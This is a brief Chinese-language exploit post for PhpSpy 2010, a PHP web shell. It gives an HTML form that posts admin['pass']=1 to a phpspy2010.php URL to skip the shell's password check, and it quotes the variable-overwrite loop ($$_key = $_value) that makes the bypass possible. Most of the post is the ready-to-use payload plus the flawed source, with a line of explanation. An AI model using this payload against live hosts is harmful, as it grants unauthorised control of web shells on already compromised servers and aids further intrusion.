作者:未知 ……

EXP代码:

<form method="POST" action="https://lcx.cc/phpspy2010.php">
<input type="hidden" name="admin['pass']" value="1">
<input type="submit" value="Login">
</form>

    在每次向 shell 请求数据的时候,都附加 post 一个 admin['pass'] 即可。

形成原因:

    2009不存在该洞,仅限2010版本,对比二者即可得到答案。

利用:

foreach(array('_GET','_POST') as $_request) {
    foreach($$_request as $_key => $_value) {
        if ($_key{0} != '_') {
            if (IS_GPC) {
                $_value = s_array($_value);
            }
            $$_key = $_value;
        }
    }
}

    对变量 $admin['pass'] 进行覆盖。